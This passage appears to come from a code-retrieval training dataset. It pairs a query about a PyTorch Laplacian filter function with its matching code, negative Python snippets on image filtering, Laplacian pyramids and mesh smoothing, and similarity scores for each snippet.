get_blur_kernel(n):\n return [1/n**2] * n**2", "def to_2dnp_array(X):\r\n if isinstance(X, np.ndarray):\r\n if X.ndim == 1:\r\n return X.reshape((-1, 1))\r\n if X.ndim == 2:\r\n return X\r\n if isinstance(X, Number):\r\n X = [X]\r\n X = np.array(X)\r\n X = X.reshape([-1, np.prod(X.shape) // X.shape[0]])\r\n return X", "def gen_cluster_arr(self, data, stop):\n\n keep = ((data[2,:] > stop*data[3,:]))\n cluster_arr = -np.ones((2,len(data[0,:])), dtype = 'i4')\n cluster_arr = cluster_arr[:,keep]\n\n return cluster_arr", "def row_conv2d(inputs, kernel, kernel_size, strides, output_shape, data_format=None):\n data_format = K.normalize_data_format(data_format)\n\n stride_row, stride_col = strides\n output_row, output_col = output_shape\n\n out = []\n for i in range(output_row):\n # Slice the rows with the neighbors they need\n slice_row = slice(i * stride_row, i * stride_col + kernel_size[0])\n if data_format == 'channels_first':\n x = inputs[:, :, slice_row, :] # batch, 16, 5, 144\n else:\n x = inputs[:, slice_row, :, :] # batch, 5, 144, 16\n # Convolve, resulting in an array with only one row: batch, 1, 140, 6 or batch, 6, 1, 140\n x = K.conv2d(x, kernel[i], strides=strides, padding='valid', data_format=data_format)\n out.append(x)\n\n if data_format == 'channels_first':\n output = K.concatenate(out, axis=2)\n else:\n output = K.concatenate(out, axis=1)\n del x\n del out\n return output", "def as_2d_array(theta):\n v = theta.view(np.float)\n N = theta.shape[0]\n v.shape = (N, - 1)\n # raise an error if v cannot be reshaped without creating a copy\n return v" ]
[ "0.68943256", "0.5928996", "0.5873876", "0.5794534", "0.5719824", "0.568754", "0.5661878", "0.56419665", "0.5635752", "0.5564691", "0.5545013", "0.553446", "0.54953605", "0.5416252", "0.5343913", "0.53213376", "0.5320362", "0.5318403", "0.5306929", "0.5298269", "0.52873653", "0.52752477", "0.5268715", "0.52602845", "0.52582073", "0.52154315", "0.5209422", "0.52089924", "0.5206422", "0.51987153", "0.5190397", "0.5186737", "0.5172944", "0.51720154", "0.51613915", "0.5152153", "0.51361245", "0.5100762", "0.5099215", "0.5093434", "0.5089017", "0.508292", "0.5077209", "0.50702816", "0.5064004", "0.5063186", "0.50584793", "0.50528204", "0.50520617", "0.5033679", "0.5032409", "0.50253236", "0.50177515", "0.5011217", "0.5000478", "0.49957487", "0.49881244", "0.498127", "0.4967551", "0.49665615", "0.49534515", "0.4943306", "0.49291173", "0.49252707", "0.49235228", "0.49230668", "0.4917709", "0.49166536", "0.49165803", "0.49107826", "0.4909897", "0.4908721", "0.49041834", "0.48932642", "0.48819712", "0.48672304", "0.48671964", "0.4856767", "0.48562926", "0.48547643", "0.48538443", "0.48503006", "0.48499", "0.48419273", "0.4834408", "0.48323083", "0.48309708", "0.48279345", "0.4824142", "0.4818578", "0.4816162", "0.48064858", "0.480414", "0.4804122", "0.48034212", "0.48029962", "0.48025203", "0.4801922", "0.47973344", "0.47954923" ]
0.66206235
1
r"""Function that returns a tensor using a Laplacian filter. The operator smooths the given tensor with a laplacian kernel by convolving it to each channel. It suports batched operation.
def laplacian(src: torch.Tensor, kernel_size: int) -> torch.Tensor: return Laplacian(kernel_size)(src)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def lapsharp(image, maskret = False):\n #padded_image = np.pad(img, (1, 1), mode = 'symmetric')\n # lap is linear therefore;\n # lap f(x,y) = f(x + 1, y) + f(x - 1, y) + f(x, y + 1) + f(x, y - 1) - 4f(x,y)...\n #--------------------\n c = -1 # Depends on kernel\n # make zero kernal\n lapmask = np.zeros((3, 3))\n \n # add values to kernel\n lapmask[0,0] = 1\n lapmask[0,1] = 1\n lapmask[0,2] = 1\n\n lapmask[1,0] = 1\n lapmask[1,1] = -8\n lapmask[1,2] = 1\n\n lapmask[2,0] = 1\n lapmask[2,1] = 1\n lapmask[2,2] = 1\n #--------------------\n mask = convolve2d(image, lapmask, mode = 'same')\n result = image + c*mask\n\n # Map values to 0-255\n g1 = image - np.min(image)\n g = g1/np.max(g1) *255\n g = g.astype('uint8')\n\n if maskret == True:\n return g, mask\n else:\n return g.astype('uint8')", "def call(self, inputs, training=None):\n with tf.device(\"/device:GPU:0\"):\n return tf.reshape(tf.einsum('bj,jk,bk->b', inputs, self.laplacian, inputs), (-1, 1))", "def laplacian(self, array_in):\r\n\r\n # Call-through to Laplacian operator, already computed\r\n return self.laplace_op*array_in", "def laplacian_1d(window_size) -> torch.Tensor:\n\n filter_1d = torch.ones(window_size)\n filter_1d[window_size // 2] = 1 - window_size\n laplacian_1d: torch.Tensor = filter_1d\n return laplacian_1d", "def get_laplacian_kernel(kernel_size) -> torch.Tensor:\n kernel: torch.Tensor = get_laplacian_kernel2d(kernel_size)\n return kernel", "def _conv_laplace_3d(tensor):\n kernel = np.array([[[0., 0., 0.], [0., 1., 0.], [0., 0., 0.]],\n [[0., 1., 0.], [1., -6., 1.], [0., 1., 0.]],\n [[0., 0., 0.], [0., 1., 0.], [0., 0., 0.]]],\n dtype=np.float32)\n kernel = kernel.reshape((3, 3, 3, 1, 1))\n if tensor.shape[-1] == 1:\n return math.conv(tensor, kernel, padding='VALID')\n else:\n return math.concat([math.conv(tensor[..., i:i + 1], kernel, padding='VALID')\n for i in range(tensor.shape[-1])], -1)", "def lfilter(taps, array, filter_centre):\n arr = array.copy()\n left_pad_len = len(taps) - filter_centre - 1\n right_pad_len = filter_centre\n arr = np.concatenate(\n (array[1:1+left_pad_len][::-1], array,\n array[-right_pad_len-1:-1][::-1]))\n return np.convolve(arr, taps[::-1], 'valid')", "def sharp_laplace2(img):\n\n # the laplacian kernel\n laplace_kern = np.array([[-1., -1., -1.],\n [-1., 0., -1.],\n [-1., -1., -1.]])\n\n # See laplace 1 above for the following lines\n img = np.asarray(img, dtype=np.int)\n sharp = img + ndi.convolve(img, laplace_kern)\n\n return np.asarray(np.clip(sharp, 0, 255), dtype=np.uint8)", "def get_laplacian_kernel(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. 
Got {}\"\n .format(kernel_size))\n window_1d: torch.Tensor = laplacian_1d(kernel_size)\n return window_1d", "def laplacian_smoothing(texture_data, lap, lap_b, nb_iter, dt):\n mod = 1\n if nb_iter > 10:\n mod = 10\n if nb_iter > 100:\n mod = 100\n if nb_iter > 1000:\n mod = 1000\n # print(tex.shape[0])\n # print(tex.ndim)\n # if tex.ndim < 2:\n # Mtex = tex.reshape(tex.shape[0],1)\n # else:\n # Mtex = tex\n # using Implicit scheme\n # B(X^(n+1)-X^n)/dt+L(X^(n+1))=0\n M = lap_b + dt * lap\n for i in range(nb_iter):\n texture_data = lap_b * texture_data\n if texture_data.ndim > 1:\n for d in range(texture_data.shape[1]):\n texture_data[:, d], infos = lgmres(\n M.tocsr(), texture_data[:, d], tol=solver_tolerance\n )\n else:\n texture_data, infos = lgmres(M.tocsr(), texture_data, tol=solver_tolerance)\n if i % mod == 0:\n print(i)\n\n # using Explicit scheme, convergence guaranteed only for dt<1 and not\n # faster than implicit when using fem Laplacian\n # B(X^(n+1)-X^n)/dt+L(X^n)=0\n # M = B-dt*L\n # for i in range(Niter):\n # Mtex = M * Mtex\n # Mtex, infos = lgmres(B.tocsr(), Mtex, tol=solver_tolerance)\n # if (i % mod == 0):\n # print(i)\n print(\" OK\")\n return texture_data", "def forward(self, x):\n x = torch.matmul(self.laplacian, x)\n dims = tuple(range(x.ndimension())[1:])\n x = x.pow(2).sum(dims)\n return x", "def uniform_laplacian(image, radius=1):\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)", "def sharp_laplace1(img):\n\n # Shapening the image with laplacian involves adding the image concolved\n # with the laplacian back to the original image. Since laplace operator\n # can generate negative values we need to use a int type image\n img = np.asarray(img, dtype=np.int)\n\n # Perform the operation\n sharp = img - ndi.laplace(img)\n\n # Clip, cast and return the result\n return np.asarray(np.clip(sharp, 0, 255), dtype=np.uint8)", "def uniform_laplacian_smoothing(vertices, faces):\n dtype = vertices.dtype\n num_vertices = vertices.shape[1]\n\n laplacian_matrix = uniform_laplacian(num_vertices, faces).to(dtype)\n smoothed_vertices = torch.matmul(laplacian_matrix, vertices) + vertices\n\n return smoothed_vertices", "def build_laplacian_nearest_neighbor_graph(\n input_vecs: types.Tensor, k: int = 1\n) -> types.Tensor:\n num_actions = tf.shape(input_vecs)[0]\n pdistance_matrix = compute_pairwise_distances(input_vecs)\n sorted_indices = tf.argsort(values=pdistance_matrix)\n selected_indices = tf.reshape(sorted_indices[:, 1 : k + 1], [-1, 1])\n rng = tf.tile(tf.expand_dims(tf.range(num_actions), axis=-1), [1, k])\n rng = tf.reshape(rng, [-1, 1])\n full_indices = tf.concat([rng, selected_indices], axis=1)\n adjacency_matrix = tf.zeros([num_actions, num_actions], dtype=tf.float32)\n adjacency_matrix = tf.tensor_scatter_nd_update(\n tensor=adjacency_matrix,\n indices=full_indices,\n updates=tf.ones([k * num_actions], dtype=tf.float32),\n )\n # Symmetrize it.\n adjacency_matrix = adjacency_matrix + tf.transpose(adjacency_matrix)\n adjacency_matrix = tf.minimum(\n adjacency_matrix, tf.ones_like(adjacency_matrix)\n )\n degree_matrix = tf.linalg.tensor_diag(tf.reduce_sum(adjacency_matrix, axis=1))\n laplacian_matrix = degree_matrix - adjacency_matrix\n return laplacian_matrix", "def laplacian_to_image(lpyr, filter_vec, coeff):\n #TODO check size\n size_list = len(lpyr)\n for i in range(size_list):\n lpyr[i] *= coeff[i]\n\n resIm = lpyr[size_list-1]\n for i in 
range(size_list- 1,0,-1):\n resIm = expand_im(resIm,filter_vec)\n resIm += lpyr[i-1]\n\n return resIm", "def build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = gaus_1d(filter_size).reshape(1, filter_size)\n g_pyr = build_gaussian_pyramid(im, max_levels, filter_size)[0]\n l_pyr = []\n for i in range(len(g_pyr) - 1):\n l_im = g_pyr[i] - expand_im(g_pyr[i + 1], filter_vec)\n l_pyr.append(l_im)\n\n l_pyr.append(g_pyr[-1])\n return [l_pyr, filter_vec]", "def _laplacian(tangent_vec):\n to_squeeze = False\n if tangent_vec.ndim == 2:\n tangent_vec = gs.expand_dims(tangent_vec, axis=0)\n to_squeeze = True\n n_tangent_vecs = len(tangent_vec)\n tangent_vec_diff = (\n tangent_vec[:, id_vertices[0]] - tangent_vec[:, id_vertices[1]]\n )\n values = gs.einsum(\n \"bd,nbd->nbd\", gs.stack([gs.flatten(cot)] * 3, axis=1), tangent_vec_diff\n )\n\n laplacian_at_tangent_vec = gs.zeros((n_tangent_vecs, n_vertices, 3))\n\n id_vertices_201_repeated = gs.tile(id_vertices[1, :], (n_tangent_vecs, 1))\n\n for i_dim in range(3):\n laplacian_at_tangent_vec[:, :, i_dim] = gs.scatter_add(\n input=laplacian_at_tangent_vec[:, :, i_dim],\n dim=1,\n index=id_vertices_201_repeated,\n src=values[:, :, i_dim],\n )\n return (\n gs.squeeze(laplacian_at_tangent_vec, axis=0)\n if to_squeeze\n else laplacian_at_tangent_vec\n )", "def lanczos(dx, width, cutoff, /):\n # Coefficients and initial stuff\n # n = (width/dx)//1 # convert window width from 'time units' to 'steps'\n # n = width//2\n # Convert alpha to wavenumber (new units are 'inverse timesteps')\n alpha = 1.0 / (cutoff / dx)\n n = width\n n = (n - 1) // 2 + 1\n tau = np.arange(1, n + 1) # lag time\n C0 = 2 * alpha # integral of cutoff-response function is alpha*pi/pi\n Ck = np.sin(2 * np.pi * alpha * tau) / (np.pi * tau)\n Cktilde = Ck * np.sin(np.pi * tau / n) / (np.pi * tau / n)\n\n # Return filter\n # Example: n = 9 returns 4 + 4 + 1 points\n order = n * 2 - 1\n print(f'Order-{order} Lanczos window')\n window = np.concatenate((np.flipud(Cktilde), np.array([C0]), Cktilde))\n return window[1:-1], 1", "def build_laplacian_over_ordinal_integer_actions(\n action_spec: types.BoundedTensorSpec,\n) -> types.Tensor:\n num_actions = policy_utilities.get_num_actions_from_tensor_spec(action_spec)\n adjacency_matrix = np.zeros([num_actions, num_actions])\n for i in range(num_actions - 1):\n adjacency_matrix[i, i + 1] = 1.0\n adjacency_matrix[i + 1, i] = 1.0\n laplacian_matrix = (\n np.diag(np.sum(adjacency_matrix, axis=0)) - adjacency_matrix\n )\n return laplacian_matrix", "def _build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = _gaussian_kernel_1d(filter_size).reshape(filter_size, 1)\n pyr = []\n im_curr = im\n im_next = _reduce(im, filter_vec)\n while _image_is_large_enough(im_next) and len(pyr) < max_levels - 1:\n pyr.append(im_curr - _expand(im_next, filter_vec))\n im_curr = im_next\n im_next = _reduce(im_curr, filter_vec)\n\n pyr.append(im_curr)\n\n return pyr, filter_vec.reshape(1, filter_size)", "def _laplacian_pyramid(batch, num_levels):\n gaussian_filter = constant_op.constant(_GAUSSIAN_FILTER)\n\n def spatial_conv(batch, gain):\n s = array_ops.shape(batch)\n padded = array_ops.pad(batch, [[0, 0], [2, 2], [2, 2], [0, 0]], 'REFLECT')\n xt = array_ops.transpose(padded, [0, 3, 1, 2])\n xt = array_ops.reshape(xt, [s[0] * s[3], s[1] + 4, s[2] + 4, 1])\n conv_out = nn_ops.conv2d(xt, gaussian_filter * gain, [1] * 4, 'VALID')\n conv_xt = array_ops.reshape(conv_out, [s[0], s[3], s[1], s[2]])\n conv_xt = array_ops.transpose(conv_xt, [0, 2, 3, 1])\n 
return conv_xt\n\n def pyr_down(batch): # matches cv2.pyrDown()\n return spatial_conv(batch, 1)[:, ::2, ::2]\n\n def pyr_up(batch): # matches cv2.pyrUp()\n s = array_ops.shape(batch)\n zeros = array_ops.zeros([3 * s[0], s[1], s[2], s[3]])\n res = array_ops.concat([batch, zeros], 0)\n res = array_ops.batch_to_space(res, crops=[[0, 0], [0, 0]], block_size=2)\n res = spatial_conv(res, 4)\n return res\n\n pyramid = [math_ops.to_float(batch)]\n for _ in range(1, num_levels):\n pyramid.append(pyr_down(pyramid[-1]))\n pyramid[-2] -= pyr_up(pyramid[-1])\n return pyramid", "def apply_laplacian(src, size):\n ddepth = cv2.CV_16S\n src = cv2.GaussianBlur(src, (size, size), 0)\n # src_gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n dst = cv2.Laplacian(src, ddepth, ksize=size)\n abs_dst = cv2.convertScaleAbs(dst)\n return abs_dst", "def get_laplacian_kernel2d(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. Got {}\"\n .format(kernel_size))\n\n kernel = torch.ones((kernel_size, kernel_size))\n mid = kernel_size // 2\n kernel[mid, mid] = 1 - kernel_size ** 2\n kernel_2d: torch.Tensor = kernel\n return kernel_2d", "def LaplacianMatrix(adjmatrix):\n if adjmatrix.dtype in [np.uint, np.uint0, np.uint8, np.uint16, np.uint32, np.uint64]:\n adjmatrix = adjmatrix.astype(int)\n N = len(adjmatrix)\n\n laplacianmatrix = np.identity(N, dtype=adjmatrix.dtype) * adjmatrix.sum(axis=1)\n laplacianmatrix -= adjmatrix\n\n return laplacianmatrix", "def prepare_laplacian(laplacian):\n\n def estimate_lmax(laplacian, tol=5e-3):\n r\"\"\"Estimate the largest eigenvalue of an operator.\"\"\"\n lmax = sparse.linalg.eigsh(laplacian, k=1, tol=tol,\n ncv=min(laplacian.shape[0], 10),\n return_eigenvectors=False)\n lmax = lmax[0]\n lmax *= 1 + 2 * tol # Be robust to errors.\n return lmax\n\n def scale_operator(L, lmax, scale=1):\n r\"\"\"Scale the eigenvalues from [0, lmax] to [-scale, scale].\"\"\"\n I = sparse.identity(L.shape[0], format=L.format, dtype=L.dtype)\n L *= 2 * scale / lmax\n L -= I\n return L\n\n lmax = estimate_lmax(laplacian)\n laplacian = scale_operator(laplacian, lmax)\n\n laplacian = sparse.coo_matrix(laplacian)\n\n # PyTorch wants a LongTensor (int64) as indices (it'll otherwise convert).\n indices = np.empty((2, laplacian.nnz), dtype=np.int64)\n np.stack((laplacian.row, laplacian.col), axis=0, out=indices)\n indices = torch.from_numpy(indices)\n\n laplacian = torch.sparse_coo_tensor(indices, laplacian.data, laplacian.shape)\n laplacian = laplacian.coalesce() # More efficient subsequent operations.\n return laplacian", "def laplace(tensor, padding='replicate', axes=None, use_fft_for_periodic=False):\n rank = spatial_rank(tensor)\n if padding is None or padding == 'valid':\n pass # do not pad tensor\n elif padding in ('circular', 'wrap') and use_fft_for_periodic:\n return fourier_laplace(tensor)\n else:\n tensor = math.pad(tensor, _get_pad_width_axes(rank, axes, val_true=[1, 1], val_false=[0, 0]), padding)\n # --- convolutional laplace ---\n if axes is not None:\n return _sliced_laplace_nd(tensor, axes)\n if rank == 2:\n return _conv_laplace_2d(tensor)\n elif rank == 3:\n return _conv_laplace_3d(tensor)\n else:\n return _sliced_laplace_nd(tensor)", "def generate_graph_laplacian(A):\r\n\r\n #Create symmetric matrix\r\n #A=0.5* (A+ A.T)\r\n \r\n #D is just the identity matrix (because sum(P)=1)\r\n Degree=np.sum(A,1)\r\n D=np.diag(Degree)\r\n \r\n #Laplacian matrix\r\n L=D-A\r\n return 
L", "def build_laplacian_pyramid(im, max_levels, filter_size):\n pyr = []\n org_reduce, filter_vec = build_gaussian_pyramid(im, max_levels, filter_size)\n for i in range(max_levels - 1):\n temp_expand = expand(org_reduce[i + 1], filter_vec)\n org_layer = org_reduce[i]\n temp = org_layer - temp_expand\n pyr.append(temp)\n # plt.imshow(org_reduce[-1], cmap='gray')\n # plt.show()\n pyr.append(org_reduce[-1])\n return pyr, filter_vec", "def lfilter(size, b, a, x, *args, **kwargs):\n\n sym_a = is_theano_object(a)\n sym_b = is_theano_object(b)\n sym_x = is_theano_object(x)\n\n M, N = size\n if sym_b or sym_x:\n s = x * b[0]\n for tau in range(1, M):\n u = x[:-tau] * b[tau]\n s = T.inc_subtensor(s[tau:], u)\n else:\n s = scipy.signal.lfilter(b, a, x, *args, **kwargs)\n return s", "def compute_mesh_laplacian(mesh, weights=None, fem_b=None, lap_type=\"conformal\"):\n print(\" Computing Laplacian\")\n if weights is None:\n (weights, fem_b) = compute_mesh_weights(mesh, weight_type=lap_type)\n\n if lap_type == \"fem\":\n weights.data = weights.data / 2\n\n N = weights.shape[0]\n sB = fem_b.sum(axis=0)\n diaB = sparse.dia_matrix((sB, 0), shape=(N, N))\n B = sparse.lil_matrix(diaB + fem_b)\n s = weights.sum(axis=0)\n dia = sparse.dia_matrix((s, 0), shape=(N, N))\n L = sparse.lil_matrix(dia - weights)\n\n # if symmetrize == 1 & & normalize == 0\n # L = diag(sum(W, 2)) - W;\n # elseif\n # symmetrize == 1 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1 / 2)) * W * diag(\n # sum(W, 2). ^ (-1 / 2));\n # elseif\n # symmetrize == 0 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1)) * W;\n\n li = np.hstack(L.data)\n print(\" -nb Nan in Laplacian : \", len(np.where(np.isnan(li))[0]))\n print(\" -nb Inf in Laplacian : \", len(np.where(np.isinf(li))[0]))\n\n return L, B", "def laplacianEdgeDetector(img):\n laplacian_kernel = np.array([[0,1,0],\\\n [1,-4,1],\\\n [0,1,0]])\n return convolve2d(img, laplacian_kernel, mode='same')", "def rebuild_the_laplacians():\n local_matrix = InteractomeInterface()\n local_matrix.full_rebuild()\n\n annot_matrix = AnnotomeInterface()\n annot_matrix.full_rebuild()", "def _sliced_laplace_nd(tensor, axes=None):\n rank = spatial_rank(tensor)\n dims = range(rank)\n components = []\n for ax in dims:\n if _contains_axis(axes, ax, rank):\n lower, center, upper = _dim_shifted(tensor, ax, (-1, 0, 1), diminish_others=(1, 1), diminish_other_condition=lambda other_ax: _contains_axis(axes, other_ax, rank))\n components.append(upper + lower - 2 * center)\n return math.sum(components, 0)", "def Naive_forwardpass(self):\n\n for filter_k in range(0, self.n_filters):\n filter_col = self.im2col(self.filter_map[filter_k].data_mtx)\n for hgt_indx in range(0, self.Output_Height):\n for wdth_indx in range(0, self.Output_Width):\n wdth_start_index = wdth_indx * self.stride_len\n wdth_end_index= wdth_start_index + self.filter_size\n hgt_start_index = hgt_indx * self.stride_len\n hgt_end_index = hgt_start_index + self.filter_size\n trn_img_area = self.input_vol.padded_mtx[:, wdth_start_index:wdth_end_index,\n hgt_start_index:hgt_end_index]\n trn_img_col = self.im2col(trn_img_area)\n self.output_Tensor.data_mtx[filter_k,wdth_indx , hgt_indx] = self.convolution_op(trn_img_col,\n filter_col) + np.sum(self.bias_vol[filter_k].data_mtx)\n return self.output_Tensor", "def apply(self, mode='lateral'):\n num_lat_slices = self.img3d.shape[0]\n num_cor_slices = self.img3d.shape[2]\n bin_mask = np.zeros(self.mask3d.shape)\n x,y,z = np.where(self.mask3d==self.vertebra_id)\n 
bin_mask[np.min(x):np.max(x), np.min(y):np.max(y), np.min(z):np.max(z)] = 1\n if mode=='lateral' or mode=='fuse':\n mask_lat = np.zeros((6, self.mask3d.shape[0], self.mask3d.shape[1], self.mask3d.shape[2]))\n img_lat = np.zeros(self.img3d.shape)\n binary_lat = np.zeros(self.mask3d.shape)\n # for each lateral slice\n for idx in range(num_lat_slices):\n img_slice, mask_slice = np.copy(self.img3d[idx, :, :]), np.copy(self.mask3d[idx, :, :])\n xloc, yloc = np.where(mask_slice==self.vertebra_id)\n # check if vertebra is present in image\n if xloc.shape[0]==0:\n # if not keep mask as it is\n mask_lat[:,idx, :, :] = self.get_one_hot(mask_slice)\n img_lat[idx, :, :] = img_slice\n else:\n min_x, max_x = np.min(xloc), np.max(xloc)\n min_y, max_y = np.min(yloc), np.max(yloc)\n inpainted_img, inpainted_mask, binary_mask = self.inpaint(img_slice, mask_slice, min_x, max_x, min_y, max_y)\n mask_lat[:,idx, :, :] = inpainted_mask\n img_lat[idx,:, :] = inpainted_img\n binary_lat[idx,:,:] = binary_mask\n\n\n if mode=='coronal' or mode=='fuse':\n mask_cor = np.zeros((6, self.mask3d.shape[0], self.mask3d.shape[1], self.mask3d.shape[2]))\n img_cor = np.zeros(self.img3d.shape)\n binary_cor = np.zeros(self.mask3d.shape)\n # for each coronal slice\n for idx in range(num_cor_slices):\n img_slice, mask_slice = np.copy(self.img3d[:, :, idx]), np.copy(self.mask3d[:, :, idx])\n xloc, yloc = np.where(mask_slice==self.vertebra_id)\n # check if vertebra is present in image\n if xloc.shape[0]==0:\n # if not keep mask as it is\n mask_cor[:, :, :, idx] = self.get_one_hot(mask_slice)\n img_cor[:, :, idx] = img_slice\n else:\n min_x, max_x = np.min(xloc), np.max(xloc)\n min_y, max_y = np.min(yloc), np.max(yloc)\n # else remove fractured vertebra and inpaint\n inpainted_img, inpainted_mask, binary_mask = self.inpaint(img_slice, mask_slice, min_x, max_x, min_y, max_y, 'coronal')\n mask_cor[:, :, :, idx] = inpainted_mask\n img_cor[:, :, idx] = inpainted_img\n binary_cor[:,:,idx] = binary_mask\n \n # return to a one channel mask and convert labels back\n if mode=='lateral':\n mask_lat = np.argmax(mask_lat, axis=0)\n mask_lat = self.map_class_to_vert(mask_lat)\n self.mask3d = mask_lat\n self.img3d = img_lat\n elif mode=='coronal':\n mask_cor = np.argmax(mask_cor, axis=0)\n mask_cor = self.map_class_to_vert(mask_cor)\n self.mask3d = mask_cor\n self.img3d = img_cor\n elif mode=='fuse':\n mask_fuse = mask_cor*0.5+mask_lat*0.5\n mask_fuse = np.argmax(mask_fuse, axis=0)\n mask_fuse = self.map_class_to_vert(mask_fuse)\n self.mask3d = mask_fuse\n self.img3d = (img_lat+img_cor)/2\n \n # save result\n self.mask3d = self.mask3d.astype(np.uint8)\n self.img3d = self.img3d.astype(np.float32)\n \n # put back if we padded and cropped\n if self.padz and self.padx:\n self.orig_img3d[:,self.ymin:self.ymax, :] = self.img3d[self.xcrop1:-self.xcrop2,:,self.zcrop1:-self.zcrop2]\n self.orig_mask3d[:,self.ymin:self.ymax, :] = self.mask3d[self.xcrop1:-self.xcrop2,:,self.zcrop1:-self.zcrop2]\n elif self.padz and not self.padx:\n self.orig_img3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, :] = self.img3d[:,:,self.zcrop1:-self.zcrop2]\n self.orig_mask3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, :] = self.mask3d[:,:,self.zcrop1:-self.zcrop2]\n elif not self.padz and self.padx:\n self.orig_img3d[:,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.img3d[self.xcrop1:-self.xcrop2,:,:]\n self.orig_mask3d[:,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.mask3d[self.xcrop1:-self.xcrop2,:,:]\n else:\n 
self.orig_img3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.img3d\n self.orig_mask3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.mask3d\n \n img = return_scan_to_orig(self.orig_img3d, self.mask_affine, self.mask_header, self.zooms)\n nib.save(img, self.inpainted_img_path)\n\n mask_fuse = return_scan_to_orig(self.orig_mask3d, self.mask_affine, self.mask_header, self.zooms, np.uint8)\n nib.save(mask_fuse, self.inpainted_mask_path)\n print('Inpaint mask and image saved at: ', self.inpainted_mask_path, self.inpainted_img_path)", "def buildLaplacianPyramid(imgIn, maxLevel): \n currentLayer=0\n imgPyramid = []\n curSrc = imgIn.astype(np.float32)\n while(currentLayer<maxLevel-1):\n curH, curW = curSrc.shape[0:2]\n if curH < 4 or curW < 4:\n break\n currentLayer+=1 \n imgBlur=cv2.GaussianBlur(curSrc, ksize=(0, 0), sigmaX=3)\n imgBlurDown=cv2.resize(imgBlur, ((curW+1)//2, (curH+1)//2))\n imgBlurUp = cv2.resize(imgBlurDown, (curW, curH))\n imgBlurUp = cv2.GaussianBlur(imgBlurUp, ksize=(0, 0), sigmaX=3)\n imgDiff=curSrc-imgBlurUp\n imgPyramid.append(imgDiff)\n curSrc = imgBlurDown\n\n imgPyramid.append(curSrc)\n return imgPyramid", "def ft_inv_laplace(a, fcc=False):\n k_sq = 1.0\n for i in range(a.shape[0]):\n for j in range(a.shape[1]):\n for l in range(a.shape[2]):\n if (i == 0) and (j == 0) and (l == 0):\n a[i,j,l] = 0\n continue\n if i > a.shape[0]/2:\n i = a.shape[0] + 1 - i\n if j > a.shape[0]/2:\n j = a.shape[0] + 1 - j\n if l > a.shape[0]/2:\n l = a.shape[0] + 1 - l\n if fcc:\n k_sq = 1.5*(i**2 + j**2 + l**2) - i*j - j*l - i*l\n else:\n k_sq = i**2 + j**2 + l**2\n a[i,j,l] = a[i,j,l]/(k_sq)", "def forward(self, A: Tensor, L: Tensor, T: int) -> Tensor:\n\n A = A.squeeze().permute(1, 0) # [K x C]\n L = L.squeeze() # [K]\n L_prime = project_lengths_softmax(T=T, L=L)\n K = A.shape[0]\n C = A.shape[1]\n l_max = int(L_prime.max() + 0.5) # round to the nearest int\n pis = torch.zeros_like(L_prime) # [K]\n\n normalized_l = self._normalize_scale(l_max, L_prime)\n normalized_p = self._normalize_location(l_max, pis, L_prime)\n\n params_mat = self._create_params_matrix(normalized_l, normalized_p) # [K x 3]\n theta = self._create_theta(params_mat) # [K x 2 x 3]\n\n grid = F.affine_grid(theta, torch.Size((K, C, 1, l_max)))\n\n temp_A = A.view(K, C, 1, 1).expand(-1, -1, -1, self.temp_width)\n upsampled_probs = F.grid_sample(temp_A, grid, mode=\"bilinear\")\n upsampled_probs = upsampled_probs.view(K, C, l_max) # [K x C x l_max]\n upsampled_cropped = []\n for i, prob in enumerate(upsampled_probs):\n prob_cropped = prob[:, 0 : round(L_prime[i].item())]\n upsampled_cropped.append(prob_cropped)\n\n out = torch.cat(upsampled_cropped, dim=1).unsqueeze(dim=0) # [1 x C x ~T]\n out = F.interpolate(input=out, size=T) # [1 x C x T]\n return out # [1 x C x T]", "def lap_split(img):\n\n with tf.name_scope('split'):\n lo = tf.nn.conv2d(img, k5x5, [1, 2, 2, 1], 'SAME')\n lo2 = tf.nn.conv2d_transpose(lo, k5x5*4, tf.shape(img), [1, 2, 2, 1])\n hi = img-lo2\n\n return lo, hi", "def _get_Laplacian_matrix(self, X):\n self.laplacian_mat, self.laplacian_sym_mat, self.laplacian_weights = self.laplacian.compute_laplacian(\n self.get_Affinity_matrix(X)\n )", "def laplaceianReduce(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n gaker = cv2.getGaussianKernel(5, -1)\r\n upsmaple_kernel = gaker @ gaker.transpose()\r\n upsmaple_kernel *= 4\r\n gau_pyr = gaussianPyr(img, levels)\r\n gau_pyr.reverse()\r\n lap_pyr = [gau_pyr[0]]\r\n for i in range(1, 
